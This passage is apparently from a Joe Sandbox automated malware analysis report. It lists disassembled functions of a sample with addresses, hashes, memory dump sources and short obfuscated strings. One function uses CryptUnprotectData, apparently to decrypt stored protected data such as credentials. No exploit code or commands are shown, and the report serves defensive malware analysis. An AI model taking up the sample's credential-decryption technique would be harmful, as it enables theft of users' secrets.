                            • Instruction ID: 72767b0520ba6a323f0583c61e4e0f203f620ddbb91a7bbf0bb7bb12e12a0d6f
                            • Opcode Fuzzy Hash: aec770a99f673b6b3085b85c0e9deeb0f2280f4b39bc31dd20eea8477c770ac9
                            • Instruction Fuzzy Hash: 5EF01D707543127FE7301F64AC49FA77BA8EF04B50F210115FA45EA3D0D7B09840DAA4
                            Function 00A9BC7F Relevance: 5.4, Strings: 3, Instructions: 1654COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Nfwt$Ua[p$6v~
                            • API String ID: 0-1217512229
                            • Opcode ID: 5fcf12a9ce4cd057a1c44efa51528a043f95c0eddde371784de375d5ff366ae0
                            • Instruction ID: b6ace17638556b5a14e8a72f9bad66cec8a30bdb3f6ddac66780e314f1090573
                            • Opcode Fuzzy Hash: 5fcf12a9ce4cd057a1c44efa51528a043f95c0eddde371784de375d5ff366ae0
                            • Instruction Fuzzy Hash: 13B204F360C6049FE304AE2DEC8577ABBE9EF94220F1A853DE6C4C3744E67598058696
                            Function 00A8E7C0 Relevance: 5.3, Strings: 3, Instructions: 1574COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: _5^o$;K'$KD5
                            • API String ID: 0-3646852682
                            • Opcode ID: fc041b55829511d80a1fb20fa4e603eabb691cc087ebb5ab625a485d4334a16f
                            • Instruction ID: 409bcbd4a0ce599a4f0874bb49f904a6100fe1921ff9227578e30d8965390c85
                            • Opcode Fuzzy Hash: fc041b55829511d80a1fb20fa4e603eabb691cc087ebb5ab625a485d4334a16f
                            • Instruction Fuzzy Hash: FFB217F39082109FE704AE2DDC8567AFBE5EF94220F168A3DEAC4D7744E63598048797
                            Function 006ECAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(006FB110,00000000,00000001,006FB100,?), ref: 006ECB06
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006ECB46
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 006ECBC9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            • Opcode ID: 10e0415e0701740c913f060615065f6654fcc34ad7f98199dce5e470e0dbe643
                            • Instruction ID: 49a9ff2b6309d435187f91eded90ae43cded0063ca199ac0f2c189928d330a29
                            • Opcode Fuzzy Hash: 10e0415e0701740c913f060615065f6654fcc34ad7f98199dce5e470e0dbe643
                            • Instruction Fuzzy Hash: E5314471A41719AFD710DB94CC92FAAB7B99B88B10F104194FA14EB2D0D7B0AE45CF90
                            Function 006D9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006D9B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 006D9BB3
                            • LocalFree.KERNEL32(?), ref: 006D9BD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: ee4a9722cb39857acdbab2e5ee0034a894df02d9a8dc72359daa6aec34e0b05c
                            • Instruction ID: b8d909da2bdb9cb3ddffa47f48f384ecdad6f22afb5de1a76b4c739f526306df
                            • Opcode Fuzzy Hash: ee4a9722cb39857acdbab2e5ee0034a894df02d9a8dc72359daa6aec34e0b05c
                            • Instruction Fuzzy Hash: 6B011D75E45309AFE7109FA4DC45FAFB779EB84B00F104555EA05AB381D7B09A008BE1
                            Function 00A937BF Relevance: 4.1, Strings: 2, Instructions: 1616COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: M9n$T<n
                            • API String ID: 0-3094142804
                            • Opcode ID: 90e4fe77d0b43d163ed1cacc2e81c2fd849ea4da3df8df71debfd591aa2b4ab7
                            • Instruction ID: 9b51c67fd32ed2c833ac833cf079e16525d6a2c82b3050c75adfd3e4da7394d4
                            • Opcode Fuzzy Hash: 90e4fe77d0b43d163ed1cacc2e81c2fd849ea4da3df8df71debfd591aa2b4ab7
                            • Instruction Fuzzy Hash: 95B206F390C2049FE304AE29DC8567ABBE5EF94720F1A493DEAC4C7744E63598058797
                            Function 00A91D35 Relevance: 4.1, Strings: 2, Instructions: 1560COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: zU$}u{
                            • API String ID: 0-3602348141
                            • Opcode ID: 11d4c363304c77c0687a5799698de269e313542fe07dbe6cc77d92edf8c70bfd
                            • Instruction ID: 5245a33a8ed7c8448a017edb3fc36d508f18b7e22867a9f439aead3ba089862b
                            • Opcode Fuzzy Hash: 11d4c363304c77c0687a5799698de269e313542fe07dbe6cc77d92edf8c70bfd
                            • Instruction Fuzzy Hash: 8AA215F3A082049FE7107E2DEC8567AFBE9EF94720F1A453DE6C4C7744EA3598058692
                            Function 00A9799B Relevance: 1.8, Strings: 1, Instructions: 540COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: go
                            • API String ID: 0-2832283748
                            • Opcode ID: bae91e36a841335cbe6a77ad66bd102622613628386d9953e8bf127fceba3e99
                            • Instruction ID: be331ca5002214e4047f6b6e8e7afc2c93e71c9c8d0c8a9e162ed46abb57151e
                            • Opcode Fuzzy Hash: bae91e36a841335cbe6a77ad66bd102622613628386d9953e8bf127fceba3e99
                            • Instruction Fuzzy Hash: D6F149F3A0C704AFE3086E2DEC8567AB7E9EF94720F1A863DE6C4C7744E57549018682
                            Function 00AAA96A Relevance: 1.5, Strings: 1, Instructions: 204COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: dlof
                            • API String ID: 0-2457419273
                            • Opcode ID: 2f6f865904a5f6d3f3703146b8e121301539d0be299d8b88ca96210a804a209c
                            • Instruction ID: ea38ef70d9269cc4f7c92fd6b608a47d774c6249be470afab88c99fc8f1f01d7
                            • Opcode Fuzzy Hash: 2f6f865904a5f6d3f3703146b8e121301539d0be299d8b88ca96210a804a209c
                            • Instruction Fuzzy Hash: 5F5136B210C704DFE3456E19EC85A7ABBF9EB65320F35852DE1C687680E7355C10E653
                            Function 0093256D Relevance: .2, Instructions: 235COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4c14876692971af35d5e281994d10ee464d2689ca2a2465d9f6dc0a0a6c55005
                            • Instruction ID: d731626f7c048690e4bcd9675fe198083e8ce41e2d42ca5038df969aaed13f6b
                            • Opcode Fuzzy Hash: 4c14876692971af35d5e281994d10ee464d2689ca2a2465d9f6dc0a0a6c55005
                            • Instruction Fuzzy Hash: F76191B3A0C2146FE344992DDC84A3BB7DAEBD4230F2AC63EE985D7744E6755C058391
                            Function 00934A45 Relevance: .2, Instructions: 178COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b0f648dd8f8dd33740419a2514498fd9ae9182d512b6bcef2b983b2fdac89f87
                            • Instruction ID: 57f3319338eacb2f837c61b0df11e971960ead21e525412738c85fdc335ce37e
                            • Opcode Fuzzy Hash: b0f648dd8f8dd33740419a2514498fd9ae9182d512b6bcef2b983b2fdac89f87
                            • Instruction Fuzzy Hash: FA5127F3A083149BE3046E2DEC8577AF7E5EB98320F1A053DEA94D7784E9355C0182D6
                            Function 00D6F18D Relevance: .2, Instructions: 153COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3371783e097aff10c0ff8af8ec0042e5eb53450c7d6b8713459ee23cb3bb1740
                            • Instruction ID: e0d1d36ee8362d05e217ec1213b33f20d6ca01687a652d423685f0b4e93a6fc2
